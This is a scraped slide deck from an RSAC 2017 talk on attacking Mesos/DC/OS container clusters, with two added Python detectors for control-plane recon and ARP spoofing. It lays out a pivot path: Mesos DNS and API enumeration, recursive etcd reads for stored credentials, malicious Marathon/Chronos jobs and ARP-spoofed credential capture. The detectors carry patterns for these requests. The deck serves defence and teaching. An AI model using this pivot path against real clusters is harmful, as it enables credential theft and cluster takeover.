LF Energy Webinar: Electrical Grid Modelling and Simulation Through PowSyBl -...
 
The Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and SalesThe Art of the Pitch: WordPress Relationships and Sales
The Art of the Pitch: WordPress Relationships and Sales
 
Leading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdfLeading Change strategies and insights for effective change management pdf 1.pdf
Leading Change strategies and insights for effective change management pdf 1.pdf
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...When stars align: studies in data quality, knowledge graphs, and machine lear...
When stars align: studies in data quality, knowledge graphs, and machine lear...
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
Connector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a buttonConnector Corner: Automate dynamic content and events by pushing a button
Connector Corner: Automate dynamic content and events by pushing a button
 
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdfSmart TV Buyer Insights Survey 2024 by 91mobiles.pdf
Smart TV Buyer Insights Survey 2024 by 91mobiles.pdf
 
Elevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object CalisthenicsElevating Tactical DDD Patterns Through Object Calisthenics
Elevating Tactical DDD Patterns Through Object Calisthenics
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 

Orchestration Ownage - RSAC 2017

  • 2. Intro
      Mike Mellor, Director, Information Security @ Adobe
      Bryce Kunz, Senior Threat Specialist @ Adobe
  • 3. Containers - The Future is Now!
      2016 Surveys: 15-16% of all organizations are already using containers in production; 35% of organizations have done a proof-of-concept.
      The Future is Now! Containers are in production now, and containers are continuing to grow in popularity.
  • 4. Containers appear more secure
      The biggest drivers: 39% to increase developer efficiency and 36% to support microservices. Organizations want to avoid cloud platform lock-in.
      2016 Surveys: Many (42%) organizations gain value in the “secure/isolated” capabilities that containers provide.
  • 5. But managing Containers feels complex
      2016 Survey: The more exposure an organization has to containers, the more complexities are exposed.
      Respondents said they found containers “too complex to integrate into existing environments,” and require “too many skilled resources to manage.”
  • 6. And are very challenging to manage at scale
      2016 Survey: The #1 challenge of containers, according to the 53% of respondents who are either using or evaluating containers, is … “Container Management.”
  • 7. Probable Security Nightmare
      “Too Complex” + Challenging to Manage = Probable Security Nightmare
      “Complexity the Worst Enemy of Security” - Bruce Schneier
  • 8. Container and Cluster Management Options
      Technology | Design | Pros | Cons
      Public Cloud Container Services | Container Centric | Easy, Scalable | Vendor Lock-in; Proprietary
      Docker Swarm | Docker Centric | Native Clustering | Limited by API
      Kubernetes | Clusters of Containerized Apps | Works w/ Docker; Mounts persistent volumes | Custom overlay requires more specialization
      Mesos & DC/OS | Cluster Management | Works w/ Docker, Kubernetes, & Native Apps; Very Flexible | Additional layers add more complexities
  • 9. Cluster Management
      Many servers (running CoreOS Linux OS) in the datacenter, AWS, Azure, etc. How do we effectively use all of these resources?
      [Diagram: servers across Datacenter, Azure, AWS, GCE, etc.]
  • 10. Mesos Master & Agents
      Mesos Master: 5050/TCP by default; distributes tasks.
      Mesos Agent: 5051/TCP by default; executes tasks.
      [Diagram: CoreOS servers, one Master and several Agents]
  • 11. Mesos is the Kernel of DC/OS
      Mesos is the kernel of the distributed operating system known as DC/OS.
      [Diagram: Kernel layer: Master and Agents]
  • 12. Frameworks
      Frameworks provide the logic. Init Jobs: Marathon. Cron Jobs: Chronos, Metronome.
      [Diagram: Frameworks layer above the Kernel]
  • 13. Supporting: Configuration Stores
      Configuration Stores keep everyone on the same page: ZooKeeper, Etcd.
      [Diagram: Supporting layer beside Kernel and Frameworks]
  • 14. Supporting: Discovery
      Discovery enables the finding of other services within the cluster: Mesos DNS.
  • 15. DC/OS Design
      Containers w/ Apps: Docker Containers, Web Apps, etc.
      [Diagram: Apps layer: containers with apps running on the Agents]
  • 16. Internet Accessible Containers
      Containers w/ Apps: Public Internet accessible, or Private Internal.
      [Diagram: the Internet reaching the public containers]
  • 17. Scenario
      Initial Access (RCE): via a vulnerable web application, into a container, as a limited user (e.g. www-data).
      [Diagram: RCE from the Internet into a container on an Agent]
  • 18. Scenario: RCE via web app within a container
      e.g. JBoss, Tomcat, OSGi Console, Axis2, etc.
  • 19. Recon via Mesos DNS
      Query via pivot: Mesos DNS, 53/UDP & TCP: DNS service.
      [Diagram: queries from the compromised container to Mesos DNS]
  • 20. .mesos TLD
      The easy way to find services within the cluster.
  • 21. Recon via Mesos DNS
      Query via pivot: Mesos DNS, 8123/TCP by default: DNS via REST API; Service Discovery within the Cluster.
  • 22. Undocumented?
      /v1/enumerate -> all mesos dns information
  • 23. Enumerate Mesos DNS using REST API
      /v1/enumerate -> all mesos dns information
  • 24. Find IP & RHP TCP ports of all services
      /v1/enumerate -> all mesos dns information
  • 25. Secure: Disable Risky Mesos DNS Features
      Disable the “AXFR” and “Enumerate” API calls.
      • Harder for attacker to discover all services
      • Applications shouldn’t commonly be using these API calls
  • 26. Recon via Mesos Master
      Query via pivot: Mesos Master, 5050/TCP by default: distributes tasks.
  • 27. Enumerate Mesos Master
      Request via the REST API.
  • 28. Enumerate Mesos Master
      Response: JSON w/ all Mesos Agents’ IP addresses within the cluster.
  • 29. Recon via Mesos DNS
      Query via pivot: Mesos Agent, 5051/TCP by default: executes tasks.
  • 30. Enumerate Mesos Agent
      Request via the REST API.
  • 31. Enumerate Mesos Agent
      Response: JSON w/ what containers are currently running on the server (i.e. basic0012).
  • 32. Secure: Logical Internal Network Segmentation
      Separates out the network into zones: Apps w/ Data; Management. Commonly with Calico, Canal, or Flannel.
  • 33. Secrets via Configuration Store
      Etcd: RHP/TCP by default (2379/TCP client/server; 2380/TCP peers). Configuration Store for CoreOS Fleet units and applications.
      ZooKeeper: 2181/TCP by default; binary protocol.
  • 34. Enumerate Etcd
      Request via the REST API recursively.
  • 35. Enumerate Etcd
      Response: JSON frequently containing secrets including credentials.
  • 36. Secure: Separate Configuration Stores
      Separate out the configuration stores into zones: Apps w/ Data; Management. Enforce separation via authentication credentials and logical network segmentation.
  • 37. Frameworks
      Marathon: Long Running Services (e.g. Containers); ensures always running.
      Chronos: Cron for the Cluster; Batch Jobs.
  • 38. RCE via Marathon Jobs
      Request via the REST API.
  • 39. RCE via Marathon Jobs
      [Diagram: the malicious Marathon job yields RCE on another Agent]
  • 40. RCE via Marathon Jobs
      Response: JSON with the malicious job status.
  • 41. RCE via Chronos Jobs
      [Diagram: the same path via a Chronos job]
  • 42. Secure: Enforce Authentication
      Applications must support and be configured to use authentication, securely store and use credentials, and be deployed securely and/or retrieve credentials securely.
      Alert on brute force attempts.
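The pivot path in slides 19 through 41 (Mesos DNS enumerate and AXFR, master and agent state, recursive etcd reads, Marathon and Chronos job submission) and the three mitigations around it (disable risky DNS features, segment the network, enforce authentication and alert on brute force) all leave a trail in control-plane access logs. The detector below is an added example written for this page, not code from the talk or from the Mesos, Marathon, Chronos or etcd projects. The log line format, the zone CIDRs, the Marathon (8080) and Chronos (4400) ports, the thresholds and the request paths other than /v1/enumerate are assumptions (the paths follow those projects' REST APIs as generally documented; check them against your versions).

```python
"""Flag container-pivot recon, secret harvesting and credential brute forcing
against cluster control-plane APIs, from access logs. Added example; log
format, zone CIDRs, Marathon/Chronos ports and thresholds are assumptions."""
import ipaddress
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Assumed zones (logical segmentation): app containers never need to reach
# control-plane services directly, so any such request is worth an alert.
ZONES = {"apps": ipaddress.ip_network("10.10.0.0/16"),
         "management": ipaddress.ip_network("10.20.0.0/16")}

# Control-plane services by default port. 53/8123/5050/5051/2379/2181 are the
# ports the deck lists; 8080 (Marathon) and 4400 (Chronos) are assumed defaults.
CONTROL_PLANE_PORTS = {53: "mesos-dns", 8123: "mesos-dns-rest",
                       5050: "mesos-master", 5051: "mesos-agent", 2379: "etcd",
                       2181: "zookeeper", 8080: "marathon", 4400: "chronos"}

# Request shapes the deck describes as recon or job injection ("METHOD path",
# or "AXFR zone" for a DNS zone transfer); paths other than /v1/enumerate are
# taken from the projects' REST APIs, not from the deck.
RISKY_REQUESTS = [
    ("mesos-dns", re.compile(r"^AXFR ")),
    ("mesos-dns-rest", re.compile(r"^GET /v1/enumerate")),
    ("mesos-master", re.compile(r"^GET /master/state")),
    ("mesos-agent", re.compile(r"^GET /slave\(1\)/state")),
    ("etcd", re.compile(r"^GET /v2/keys/.*recursive=true")),
    ("marathon", re.compile(r"^POST /v2/apps")),
    ("chronos", re.compile(r"^POST /v1/scheduler/iso8601")),
]

LINE_RE = re.compile(r'(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+):(?P<port>\d+) '
                     r'req="(?P<req>[^"]+)" status=(?P<status>\d+)')


def zone_of(ip):
    """Zone name for an address, or None when it is in no known zone."""
    addr = ipaddress.ip_address(ip)
    return next((name for name, net in ZONES.items() if addr in net), None)


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["port"], rec["status"] = int(rec["port"]), int(rec["status"])
    return rec


def analyze(lines, brute_threshold=5, window=timedelta(seconds=60)):
    """One alert per suspicious control-plane request, with every reason it fired."""
    alerts = []
    failures = defaultdict(deque)  # (src, dst, port) -> recent 401/403 timestamps
    for line in lines:
        rec = parse_line(line)
        service = CONTROL_PLANE_PORTS.get(rec["port"]) if rec else None
        if service is None:
            continue  # unparseable, or not a control-plane service
        reasons = []
        if zone_of(rec["src"]) == "apps":
            reasons.append(f"app-zone source reached {service} (segmentation violation)")
        for svc, pattern in RISKY_REQUESTS:
            if svc == service and pattern.match(rec["req"]):
                reasons.append(f"recon/abuse pattern on {service}: {rec['req']}")
        if rec["status"] in (401, 403):
            recent = failures[(rec["src"], rec["dst"], rec["port"])]
            recent.append(rec["ts"])
            while rec["ts"] - recent[0] > window:  # drop failures outside the window
                recent.popleft()
            if len(recent) == brute_threshold:  # fires once, as the threshold is crossed
                reasons.append(f"{brute_threshold} auth failures against {service} "
                               f"within {int(window.total_seconds())}s (brute force)")
        if reasons:
            alerts.append({"ts": rec["ts"].isoformat(), "src": rec["src"],
                           "dst": f"{rec['dst']}:{rec['port']}", "service": service,
                           "reasons": reasons})
    return alerts


# Constructed sample: one legitimate lookup from the management zone, then a
# compromised app container (10.10.3.7) walking the deck's pivot path.
SAMPLE_LOG = """\
2017-02-14T10:00:01Z src=10.20.1.9 dst=10.20.0.5:8123 req="GET /v1/services/_leader._tcp.marathon.mesos" status=200
2017-02-14T10:00:05Z src=10.10.3.7 dst=10.20.0.5:8123 req="GET /v1/enumerate" status=200
2017-02-14T10:00:09Z src=10.10.3.7 dst=10.20.0.5:53 req="AXFR mesos." status=200
2017-02-14T10:00:12Z src=10.10.3.7 dst=10.20.0.10:5050 req="GET /master/state" status=200
2017-02-14T10:00:15Z src=10.10.3.7 dst=10.20.0.11:2379 req="GET /v2/keys/?recursive=true" status=200
2017-02-14T10:00:20Z src=10.10.3.7 dst=10.20.0.12:8080 req="POST /v2/apps" status=401
2017-02-14T10:00:21Z src=10.10.3.7 dst=10.20.0.12:8080 req="POST /v2/apps" status=401
2017-02-14T10:00:22Z src=10.10.3.7 dst=10.20.0.12:8080 req="POST /v2/apps" status=401
2017-02-14T10:00:23Z src=10.10.3.7 dst=10.20.0.12:8080 req="POST /v2/apps" status=401
2017-02-14T10:00:24Z src=10.10.3.7 dst=10.20.0.12:8080 req="POST /v2/apps" status=401
2017-02-14T10:00:30Z src=10.10.8.2 dst=10.10.8.3:80 req="GET /index.html" status=200
"""

if __name__ == "__main__":
    for a in analyze(SAMPLE_LOG.splitlines()):
        print(a["ts"], a["src"], "->", a["dst"], "|", "; ".join(a["reasons"]))
```

The zone check is deliberately the first reason: once app containers are segmented from the management zone, a request from an app address to any control-plane port is a policy violation regardless of which path it asks for, so the detector keeps firing even for endpoints not in RISKY_REQUESTS. The brute-force counter only tracks control-plane ports, which keeps the memory bounded to the handful of services that matter.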
  • 43. Creds via MitM with ARP Spoofing
      Another Container has the Creds for Marathon.
      [Diagram: a second container on the same Agent holding Marathon credentials]
  • 44. Creds via MitM with ARP Spoofing
      Attacker uses ARP spoofing to redirect that container’s traffic to the compromised container. Attacker collects the credentials.
      [Diagram: ARP poisoning between the two containers]
  • 45. Creds via MitM with ARP Spoofing
      Attacker can now create malicious Marathon jobs, negating authentication security controls.
      [Diagram: RCE via Marathon using the captured credentials]
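The ARP spoofing in slides 43 to 45 works because a container's neighbour cache accepts whichever reply arrives; the durable fix is the TLS in the next slide, but the poisoning itself is also observable on the shared bridge. The monitor below is an added example for this page, not code from the talk: it keeps a trusted IP-to-MAC baseline and raises two kinds of alert, an IP answered by a MAC other than its baseline owner, and one MAC answering for addresses it does not own. The ARP replies, addresses and MACs are constructed; the feed in a real deployment (arpwatch, a capture on the container bridge, or neighbour-table change events) is an assumption.

```python
"""Detect ARP spoofing on a cluster network segment from observed ARP replies.
Added example; the events and addresses are constructed, and the feed that
would supply them in production is an assumption."""
from collections import defaultdict

# Constructed: addresses a credential-stealing attacker would want to impersonate.
PROTECTED_IPS = {"10.10.3.1": "default gateway", "10.20.0.12": "marathon"}


class ArpMonitor:
    def __init__(self, trusted=None):
        # Trusted IP -> MAC baseline. Provision it from the CNI/IPAM inventory where
        # you can; addresses not in it are trusted on first sight (weaker).
        self.ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
        self.mac_to_ips = defaultdict(set)  # every IP each MAC has answered for
        for ip, mac in self.ip_to_mac.items():
            self.mac_to_ips[mac].add(ip)
        self.alerts = []
        self._seen = set()  # de-duplicate repeated poison replies

    def _alert(self, kind, ts, mac, ip, detail):
        key = (kind, mac, ip)
        if key not in self._seen:
            self._seen.add(key)
            self.alerts.append({"kind": kind, "ts": ts, "mac": mac, "ip": ip, "detail": detail})

    def observe(self, ts, ip, mac):
        """Feed one ARP reply ("ip is-at mac")."""
        mac = mac.lower()
        owner = self.ip_to_mac.get(ip)
        if owner is None:
            self.ip_to_mac[ip] = mac  # first-seen trust for an unknown address
        elif owner != mac:
            # Do not overwrite the baseline: a poisoned mapping must keep alerting.
            self._alert("ip_mac_change", ts, mac, ip,
                        f"{ip} answered by {mac}, baseline owner is {owner}")
        self.mac_to_ips[mac].add(ip)
        # Addresses this MAC answers for without owning them in the baseline.
        foreign = sorted(p for p in self.mac_to_ips[mac] if self.ip_to_mac.get(p) != mac)
        if foreign:
            names = [PROTECTED_IPS.get(p, "unlisted host") for p in foreign]
            self._alert("multi_ip_mac", ts, mac, ",".join(foreign),
                        f"{mac} answers for {foreign} ({', '.join(names)})")

    def suspect_macs(self):
        """MACs that have answered for an address belonging to a different MAC."""
        return {a["mac"] for a in self.alerts}


# Constructed replies (time, sender IP, sender MAC) on the agent's container bridge.
SAMPLE_ARP_REPLIES = [
    ("10:00:00", "10.10.3.1", "02:42:0a:0a:03:01"),   # gateway, legitimate
    ("10:00:01", "10.20.0.12", "02:42:0a:14:00:0c"),  # marathon, legitimate
    ("10:00:02", "10.10.3.7", "02:42:0a:0a:03:07"),   # compromised container
    ("10:00:03", "10.10.3.9", "02:42:0a:0a:03:09"),   # container holding Marathon creds
    ("10:00:10", "10.10.3.1", "02:42:0a:0a:03:07"),   # poison: 3.7 claims the gateway
    ("10:00:11", "10.20.0.12", "02:42:0a:0a:03:07"),  # poison: 3.7 claims marathon
    ("10:00:12", "10.10.3.1", "02:42:0a:0a:03:07"),   # repeated poison, de-duplicated
]


def run(replies=SAMPLE_ARP_REPLIES, trusted=None):
    mon = ArpMonitor(trusted)
    for ts, ip, mac in replies:
        mon.observe(ts, ip, mac)
    return mon


if __name__ == "__main__":
    for alert in run().alerts:
        print(alert["ts"], alert["kind"], alert["detail"])
```

Pass a provisioned `trusted` map whenever you have one: with first-seen trust, an attacker who announces a protected address before its real owner ever replies would be accepted as the owner, which the baseline check catches. Even with the monitor in place, slide 46 still applies: validated TLS means that a successfully redirected session yields no credentials.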
  • 46. Secure: TLS for Internal Communications
      Enable TLS w/ valid certificates for strong HTTPS communications. Anything using credentials needs TLS!
      Validate Certificates; Fail closed on bad certificates; Alert on certificate errors.
      [Diagram: the ARP-redirected session now carries only TLS-protected traffic]
  • 47. Strategic Actions
      Next week: Assess which services you can enable Authentication & TLS on w/o breaking your existing applications within the cluster.
      Three months from now: Implement Authentication & TLS on safe services and frameworks, focusing on services responsible for orchestration within the cluster. Deploy separate services where possible for Apps that do not support TLS & Auth.
      Six months from now: Retrofit all Applications within the cluster to use TLS & Authentication. Enforce the use of TLS & Authentication internally everywhere (disable clear-text).
  • 48. Big Picture
      Container Adoption Is Maturing, especially in Enterprises. Enterprises are using containers in production.
  • 49. Big Picture
      Pivoting from a compromised service within the cluster (no container breakout / 0day / exploit needed :) ) may enable an attacker to completely compromise the cluster.
  • 50. Big Picture
      Looking Beyond the Border with a Defense in Depth strategy secures the Future & the cluster.
  • 51. Thank you!
  • 52. Future Research
      Testing MitM from a compromised container: NCC Group’s report states this is possible for co-hosted containers.
      Test downgrade of HTTPS communications: Can we downgrade from HTTPS to HTTP and capture creds from another container?
      Test Certs (e.g. can cert pinning be enabled?) to REST APIs: Can we MitM and impersonate the API service?
      Test Authentication Brute force attacks: Fairly certain there are no lockouts; can we enable better authentication security? Write module to brute-force and guess creds.
      Test Logical Network Segmentation Tools: Calico, Canal, Flannel. Note: these should work as advertised but probably we should independently verify.
  • 53. References
      https://www.cloudfoundry.org/wp-content/uploads/2016/06/Cloud-Foundry-2016-Container-Report.pdf
      https://clusterhq.com/assets/pdfs/state-of-container-usage-june-2016.pdf
      http://www.rightscale.com/blog/cloud-industry-insights/new-devops-trends-2016-state-cloud-survey